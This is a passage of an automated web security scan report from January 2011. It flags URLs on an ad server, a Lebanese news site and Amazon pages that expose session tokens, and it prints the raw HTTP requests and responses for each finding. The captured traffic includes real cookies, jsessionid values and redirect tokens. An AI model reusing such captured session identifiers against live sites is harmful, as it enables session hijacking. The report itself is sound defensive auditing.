GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:01:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.65. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://starscene.dailystar.com.lb
Path:	/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.apture.com/js/apture.js?siteToken=5rLcDWk

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fs7cao9ricm3m32upt64vdhf53; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:02:33 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:02:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</div>
<script type='text/javascript' id='aptureScript' src='http://www.apture.com/js/apture.js?siteToken=5rLcDWk' charset='utf-8'></script>
...[SNIP]...

9.66. http://www.amazon.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=pd_lpo_ix_gw_am_us_ca_en/183-0141411-2666057?ie=UTF8&location=http%3A%2F%2Fwww.amazon.ca%2Fgp%2Fhomepage.html%3Ftag%3Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=0SBFNHA40PDAQCKXW60Q&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.67. http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_10/191-9849773-1831958?location=http://www.pcworld.com/article/202146/amazon_kindle_3_the_best_kindle_yet.html&token=D9CB6E2A29AB1E9D9FDC167523A8318384D83181&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_12/191-9849773-1831958?location=http://www.pcmag.com/article2/0,2817,2368075,00.asp&token=6B5D74846F287633B361444F8611D03583758E3C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_14/191-9849773-1831958?location=http://www.zdnet.com/blog/btl/review-my-20-minutes-with-amazons-latest-kindle/37252&token=5530EC54CBF650B76674ECF0F50AADBEFC9C0B6B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_16/191-9849773-1831958?location=http://www.crunchgear.com/2010/07/28/amazon-reveals-new-kindle-139-for-wi-fi-version/&token=888A7FA0C2516C44AA33B5A80C267236CE93D96B&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_17/191-9849773-1831958?location=http://ireaderreview.com/2010/07/28/kindle-3-review/&token=48DB81F4832216373A8CF9DDF08F2A06EE62AE6A&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_2/191-9849773-1831958?location=http://www.nytimes.com/2010/08/26/technology/personaltech/26pogue.html&token=FC3BB6E90A3E8721ADB0B39F84805E48900EDACD&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_4/191-9849773-1831958?location=http://www.fastcompany.com/1684575/wanted-amazon-kindle-3rd-generation&token=3E149F19B6E9E7F0A5EBFF5447967C76704426D7&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_6/191-9849773-1831958?location=http://reviews.cnet.com/e-book-readers/amazon-kindle-3g-wi/4505-3508_7-34140425.html&token=31E3D690023DB719242D9ACF186BCE6C53185AEC&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=amb_link_353825462_8/191-9849773-1831958?location=http://www.engadget.com/2010/08/27/amazon-kindle-review/&token=FF754E482756BF305A345655C9D0461CE99EA38C&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-74&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1275932702&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=amb_link_354073722_1/191-9849773-1831958?_encoding=UTF8&location=http%3A%2F%2Fclient0.cellmaps.com%2Fviewer.html%3Fcov%3D1&token=F65275FC32A090EFBE50BC510943370FAF8CBE85&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-22&pf_rd_r=0FSERHCXPR6RX175GC9Y&pf_rd_t=201&pf_rd_p=1277899102&pf_rd_i=B002Y27P3M
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_ylApnb0SRCP6X?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_fa_dp_ylApnb0SRCP6X%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pearl%2520Technology%2520by%2520Amazon
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_ylApnb0SRCP6X?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002Y27P3M%252Fx22%252Fref%253Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pea...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_tw_dp_ylApnb0SRCP6X%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/191-9849773-1831958?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=34040DAFFA8D9FF7D38AE1CFEC267643F302753F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=67C96CBDB127CADA2FE6B4C6C90A77D807347B28&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2DD3INQCCS1RT/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=239124B8CDE626321FEF87F4FA5D23AAB3DEF3CF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2DD3INQCCS1RT.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F4D3377DB2B4B5BDAFCA46384B42B1383F728255&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DF95BDF4B945C023B44855B9FEFEE9494DB99FE4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2YVZNKUMWGYJ4/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=45398D950F1929A712848FA11DAE56FAEDE1C83E&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R2YVZNKUMWGYJ4.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958
http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=330222DF2979944A771EE86DB7040F720CF0E604&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=670B2440B1EC894C9D07A9066327BA7768EAAF48&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Helpful.Reviews&voteSessionID=191-9849773-1831958
http://www.amazon.com/gp/voting/cast/Reviews/2115/RJUKFI4PVQ6E0/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=7C301DD2579DCC72E2BFEE04ADBAEF6D4EF82AAB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMlkyN1AzTS94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RJUKFI4PVQ6E0.2115.Inappropriate.Reviews&voteSessionID=191-9849773-1831958

Request

GET /Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:35 GMT
Server: Server
x-amz-id-1: 0FSERHCXPR6RX175GC9Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: kR10u+vmtmJMjH8b0QtzQOA7YFXccTCuWSFp6hNB3ud9u6GhHvfORZRd53Wds1YX
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=191-9849773-1831958; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 738612

<html>
<head>

<style type="text/css"><!--

BODY { font
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_ylApnb0SRCP6X?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_fa_dp_ylApnb0SRCP6X%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pearl%2520Technology%2520by%2520Amazon" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_ylApnb0SRCP6X?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002Y27P3M%2Fref%3Dcm_sw_r_fa_dp_ylApnb0SRCP6X%26bodytext%3DKindle%2520Wireless%2520Reading%2520Device%252C%2520Wi-Fi%252C%2520Graphite%252C%25206%2522%2520Display%2520with%2520New%2520E%2520Ink%2520Pearl%2520Technology%2520by%2520Amazon', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
